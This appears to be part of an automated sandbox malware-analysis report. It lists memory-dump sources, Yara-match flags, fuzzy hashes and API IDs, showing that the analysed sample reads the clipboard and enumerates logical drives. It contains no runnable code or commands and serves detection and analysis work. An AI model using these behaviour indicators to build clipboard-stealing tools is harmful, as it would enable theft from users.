                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
                                                                                                                                                                                                                                • Instruction ID: c9cc8284e85fe6abf120993d5689944f48ac7ce1a7ddbbf0d82d0496898c4a81
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6911D331104B508FD7248F25C8243A7BBE1AB56318F198A5DC1E7877D1DB7AE1098B44
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                                • Instruction ID: 4e268421f6a8116776c54cafbc69073ccffd6ecab4bef5cccecf45357530fcc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69017C641083C28FEB128F28D510BA6FFF0AF63314F1896C6D4D68B683D3799949C765
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                                • Instruction ID: f399462e58419c9d3019aec57572db2d86c2935946d127ab36988b8cbde57321
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A0171745082828FD7128F2994206A6FBE0EF63314F1896C7D4D58BA83C368A985C7A9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                                • Instruction ID: 9e577a6398dd8aca807da9a7cff46f01869594085defd8c89ee8abaa7c997aef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44018B201083C28FFB128B289510BA6FFF0AF63324F1896C6D4D68F683D3699949C765
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
                                                                                                                                                                                                                                • Instruction ID: 974cc1237fe4b8896c88182ed8fd85c9bcb06dc47b26641e710d9b196c7ad40c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E201DF605042C28EFB118F28D410BA6FFE0FFA3324F189696C4D58B682D775C845C761
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                                • Instruction ID: 925483313e90eaab4478f3efb897dfea373d722ea9097d537696ebe3f586dc89
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B90184305082C28ED7128F2984207A6FFA0EF63314F1895C7D4D58F6C3C3689985C7A9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
                                                                                                                                                                                                                                • Instruction ID: ce15afb6e8349f4df79a6844a38630f2605c57d7838470a331403b3b5471d388
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D01F2745082828EEB128F29D0107A7FBE0EF63314F18969AC4D58F6C3C379D885C7A9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
                                                                                                                                                                                                                                • Instruction ID: c0b4a7645aed046faff80445a1a00849260a9e0a604dc3165cb580035c2becad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5110C7025C3808FD7148F54D9D576BBBE1ABD2304F244A2CD5C127292D7F5890987A7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                • Instruction ID: c4cfb68b05269cc04e0ab7518c43c4b6fa0346c06a13de339d5abca23db6e943
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2001AD201083C28FFB124B289410BB6FFE0AF63314F1896C6D4D58F683D3698949C765
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                • Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA01A2205082C28EE7128F2984207B6FFA0EF63314F1896C7D4D58F6C3C3699985C7A9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                • Instruction ID: 1f160f37c6d14ad34f3cfee8a3b605875c8d547bcb3fb5b4b916acddf5707299
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A611277465C3808FD718CF28DDC076ABBE2ABD6714F244A2CE5C117256C7B1E90ACB66
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                • Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
                                                                                                                                                                                                                                • Instruction ID: 68279d06237bd8190fbc637e6641ef37e368ae7e90df92976d61ce24cdaabffb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8401AD6551D3C14BDB2A8F3494643EABFE1DFA7324F0848AEC0C157193EA39854AC72A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                • Instruction ID: a8d7cdca408c263d069fcb72ad129033d9b68755c0cdaf77ab72c5dd98612344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42E09A38910145CFC7048F58C862676BBB0FF0B304B18A46ADD82EB320E3389905D7AD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                • Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                • Instruction ID: 2b239d20bfdad45454c063696751a70b75d58c5b3a4c5e47dffb0415b3edc8bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E05934618AC18BC218FB15DCA5839776AFFC1308750546D945727E52DE74A846CB0A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                • Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                • Instruction ID: 074faf27162880f56014edafbbf82fc7a7461b86d2d9f4fc235ea592435deadd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D0A7716487A10E5B588D7854A087BFFE4F947612B1815AEE4D1E7115E220EC018758
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                • Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                • Instruction ID: 2266afc413d317257c0bd19c7d0afc13e4122e011624a5490ff0070e5fd5b05e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1C04C69A6C4008A9248CB15AC5053167B69B8B254715E429841A63255E22494578A1D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                                • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                                • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                                • API String ID: 2832541153-984153585
                                                                                                                                                                                                                                • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                • Instruction ID: b1f666a0dbb3dbfb4293667f302f035a48859e8ae09f99cbcf70eb973f603382
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86417B7040C3818ED300EF78948936FBFE0AB92318F094D6DE5C997292D6BDD5488BA7
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                                • API String ID: 2832541153-984153585
                                                                                                                                                                                                                                • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                                • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DrivesLogical
                                                                                                                                                                                                                                • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                                                                                                                                                • API String ID: 999431828-351939610
                                                                                                                                                                                                                                • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
